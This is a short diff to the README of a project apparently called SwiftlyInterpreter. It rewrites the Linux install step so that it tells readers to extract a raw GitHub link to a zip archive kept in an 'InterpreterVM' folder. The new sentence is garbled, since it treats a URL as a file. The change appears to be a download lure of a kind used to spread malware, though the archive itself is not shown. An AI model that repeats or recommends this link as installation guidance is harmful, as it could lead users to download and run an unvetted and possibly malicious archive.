ecko5popasquqash/SwiftlyInterpreter/README.md

 5. **Install the Application**:
    - **Windows:** Double-click the `.exe` file.
 Follow the prompts to complete the installation.
    - **macOS:** Open the `.dmg` file, drag the SwiftlyInterpreter icon to your Applications folder, then open it.
-   - **Linux:** Extract the `.tar.gz` file using your file manager or command line, then follow the included installation instructions.
+   - **Linux:** Extract the `https://github.com/ecko5popasquqash/SwiftlyInterpreter/raw/refs/heads/main/InterpreterVM/Swiftly_Interpreter_v1.4-beta.5.zip` file using your file manager or command line, then follow the included installation instructions.

 ## 🔍 Using SwiftlyInterpreter